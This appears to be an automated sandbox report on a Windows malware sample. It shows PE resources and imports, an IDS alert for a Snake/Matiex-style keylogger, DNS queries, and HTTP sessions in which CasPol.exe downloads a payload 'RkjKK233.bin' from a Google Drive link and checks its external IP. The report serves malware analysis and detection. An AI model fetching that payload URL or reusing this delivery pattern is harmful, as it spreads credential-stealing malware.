RT_ICON        0x3f7668  0x468    Device independent bitmap graphic, 16 x 32 x 32, image size 1024     English   United States
RT_DIALOG      0x3f7ad0  0x100    data                                                                 English   United States
RT_DIALOG      0x3f7bd0  0xf8     data                                                                 English   United States
RT_DIALOG      0x3f7cc8  0xa0     data                                                                 English   United States
RT_DIALOG      0x3f7d68  0x60     data                                                                 English   United States
RT_GROUP_ICON  0x3f7dc8  0x76     data                                                                 English   United States
RT_MANIFEST    0x3f7e40  0x423    XML 1.0 document, ASCII text, with very long lines (1059), with no line terminators  English   United States
DLL           Import
KERNEL32.dll  SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll    GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll     SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll   SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll  AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll  ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll     OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system  Country where language is spoken  Map
English                         United States
Timestamp                 Protocol  SID      Message                                                       Source Port  Dest Port  Source IP      Dest IP
03/20/23-11:06:12.385242  TCP       2039190  ET TROJAN 404/Snake/Matiex Keylogger Style External IP Check  49801        80         192.168.11.20  132.226.8.169
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                                Mar 20, 2023 11:06:10.991880894 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:10.992635965 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:10.992887974 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:10.992938995 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:10.993135929 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:10.994764090 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:10.994924068 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:10.994976044 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:10.995349884 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:10.997493029 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:10.997740030 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:10.998691082 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:10.998888016 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:10.998948097 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:10.999191999 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:10.999248028 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:10.999530077 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:10.999576092 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:10.999773979 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:10.999778986 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:10.999816895 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.000003099 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.000003099 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.000072956 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.000294924 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.000356913 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.000560999 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.000607014 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.000802040 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.000852108 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.001095057 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.001132965 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.001480103 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.001739979 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.001935959 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.001996994 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.002201080 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.002250910 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.002553940 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.002605915 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.002842903 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.002895117 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.002944946 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.003164053 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.003164053 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.003472090 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.003706932 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.003756046 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.003926992 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.003973961 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.004225969 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.004287958 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.004504919 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.004558086 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.004844904 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.004889965 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.005086899 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.005131960 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.005325079 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.005346060 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.005374908 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.005662918 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.005707026 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.005911112 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.006064892 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.006263018 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.006319046 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.006515026 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.006548882 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.006783962 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.007283926 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.007477045 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.007622957 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.007813931 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.007875919 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.008069992 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.008122921 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.008375883 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.008418083 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.008717060 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.008717060 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.008760929 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.008966923 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.008966923 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.009032011 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.009248972 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.009293079 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.009495020 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.009530067 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.009718895 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.009747028 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.009774923 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.010253906 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.010339022 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.010365009 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.010704994 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.010751009 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.010998964 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.011044979 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.011240005 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.011281013 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.011472940 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.011516094 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.011707067 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.011749029 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.011842966 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.011940956 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.012042046 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.012132883 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.012378931 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.012430906 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.012626886 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.012676001 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.012883902 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.012928963 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.013228893 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.013277054 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.013524055 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.013561964 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.013585091 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.013691902 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.013866901 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.013951063 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.014199972 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.014246941 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.014517069 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.014544964 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.014569044 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.014859915 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.014909983 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.015132904 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.015185118 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.015444994 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.015496016 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.015521049 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.015786886 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.015888929 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.016124010 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.016177893 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.016382933 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.016438961 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.016720057 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.016772032 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.016971111 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.017024040 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.017077923 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.017189980 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.017318010 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.017360926 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.017416954 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.017550945 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.017680883 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.017692089 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.017734051 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.017898083 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.017986059 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.018024921 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.018220901 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.018240929 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.018290997 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.018436909 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.018604994 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.018654108 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.018819094 CET49800443192.168.11.20142.250.185.193
                                                                                                Mar 20, 2023 11:06:11.018861055 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.019040108 CET44349800142.250.185.193192.168.11.20
                                                                                                Mar 20, 2023 11:06:11.019073963 CET49800443192.168.11.20142.250.185.193
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Mar 20, 2023 11:06:09.935673952 CET | 55851 | 53 | 192.168.11.20 | 1.1.1.1 |
| Mar 20, 2023 11:06:09.945154905 CET | 53 | 55851 | 1.1.1.1 | 192.168.11.20 |
| Mar 20, 2023 11:06:10.684120893 CET | 52547 | 53 | 192.168.11.20 | 1.1.1.1 |
| Mar 20, 2023 11:06:10.718591928 CET | 53 | 52547 | 1.1.1.1 | 192.168.11.20 |
| Mar 20, 2023 11:06:12.076256037 CET | 63331 | 53 | 192.168.11.20 | 1.1.1.1 |
| Mar 20, 2023 11:06:12.085616112 CET | 53 | 63331 | 1.1.1.1 | 192.168.11.20 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Mar 20, 2023 11:06:09.935673952 CET | 192.168.11.20 | 1.1.1.1 | 0x6c07 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false |
| Mar 20, 2023 11:06:10.684120893 CET | 192.168.11.20 | 1.1.1.1 | 0x372d | Standard query (0) | doc-0s-a8-docs.googleusercontent.com | A (IP address) | IN (0x0001) | false |
| Mar 20, 2023 11:06:12.076256037 CET | 192.168.11.20 | 1.1.1.1 | 0x58b7 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Mar 20, 2023 11:06:09.945154905 CET | 1.1.1.1 | 192.168.11.20 | 0x6c07 | No error (0) | drive.google.com | | 142.250.181.238 | A (IP address) | IN (0x0001) | false |
| Mar 20, 2023 11:06:10.718591928 CET | 1.1.1.1 | 192.168.11.20 | 0x372d | No error (0) | doc-0s-a8-docs.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Mar 20, 2023 11:06:10.718591928 CET | 1.1.1.1 | 192.168.11.20 | 0x372d | No error (0) | googlehosted.l.googleusercontent.com | | 142.250.185.193 | A (IP address) | IN (0x0001) | false |
| Mar 20, 2023 11:06:12.085616112 CET | 1.1.1.1 | 192.168.11.20 | 0x58b7 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Mar 20, 2023 11:06:12.085616112 CET | 1.1.1.1 | 192.168.11.20 | 0x58b7 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false |
| Mar 20, 2023 11:06:12.085616112 CET | 1.1.1.1 | 192.168.11.20 | 0x58b7 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false |
| Mar 20, 2023 11:06:12.085616112 CET | 1.1.1.1 | 192.168.11.20 | 0x58b7 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false |
| Mar 20, 2023 11:06:12.085616112 CET | 1.1.1.1 | 192.168.11.20 | 0x58b7 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false |
| Mar 20, 2023 11:06:12.085616112 CET | 1.1.1.1 | 192.168.11.20 | 0x58b7 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false |
                                                                                                • drive.google.com
                                                                                                • doc-0s-a8-docs.googleusercontent.com
                                                                                                • checkip.dyndns.org
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 0 | 192.168.11.20 | 49799 | 142.250.181.238 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |

| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|

| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 1 | 192.168.11.20 | 49800 | 142.250.185.193 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |

| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|

| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 2 | 192.168.11.20 | 49801 | 132.226.8.169 | 80 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |

| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| Mar 20, 2023 11:06:12.385241985 CET | 368 | OUT | GET / HTTP/1.1 |
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                Host: checkip.dyndns.org
                                                                                                Connection: Keep-Alive
| Mar 20, 2023 11:06:12.676901102 CET | 368 | IN | HTTP/1.1 200 OK |
                                                                                                Date: Mon, 20 Mar 2023 10:06:12 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 103
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 33 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.35</body></html>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 0 | 192.168.11.20 | 49799 | 142.250.181.238 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |

| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2023-03-20 10:06:10 UTC | 0 | OUT | GET /uc?export=download&id=1XARcr4sm_5_dvnsnsVtsDOfjHfua_08k HTTP/1.1 |
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                Host: drive.google.com
                                                                                                Cache-Control: no-cache
| 2023-03-20 10:06:10 UTC | 0 | IN | HTTP/1.1 303 See Other |
                                                                                                Content-Type: application/binary
                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                Date: Mon, 20 Mar 2023 10:06:10 GMT
                                                                                                Location: https://doc-0s-a8-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/mjejjps3gi1cd44ihbckcd43d7dn78od/1679306700000/12467729248612761337/*/1XARcr4sm_5_dvnsnsVtsDOfjHfua_08k?e=download&uuid=dc7be3b5-c5f0-4bcb-ad3e-a7d72194b047
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                Content-Security-Policy: script-src 'nonce-f7DVFI7CS3-UrV8E5bTN-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                Server: ESF
                                                                                                Content-Length: 0
                                                                                                X-XSS-Protection: 0
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                Connection: close


| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 1 | 192.168.11.20 | 49800 | 142.250.185.193 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |

| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2023-03-20 10:06:10 UTC | 1 | OUT | GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/mjejjps3gi1cd44ihbckcd43d7dn78od/1679306700000/12467729248612761337/*/1XARcr4sm_5_dvnsnsVtsDOfjHfua_08k?e=download&uuid=dc7be3b5-c5f0-4bcb-ad3e-a7d72194b047 HTTP/1.1 |
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                Cache-Control: no-cache
                                                                                                Host: doc-0s-a8-docs.googleusercontent.com
                                                                                                Connection: Keep-Alive
| 2023-03-20 10:06:10 UTC | 2 | IN | HTTP/1.1 200 OK |
                                                                                                X-GUploader-UploadID: ADPycdtUxiotCr-eS8umlDz2hJGpYTDklciRwgbZCaLNJ85Q7_nE508RQhokXuY5eLEGVxIRTJGtHc9LTDcsdajRlg00kA
                                                                                                Content-Type: application/octet-stream
                                                                                                Content-Disposition: attachment; filename="RkjKK233.bin"; filename*=UTF-8''RkjKK233.bin
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Access-Control-Allow-Credentials: false
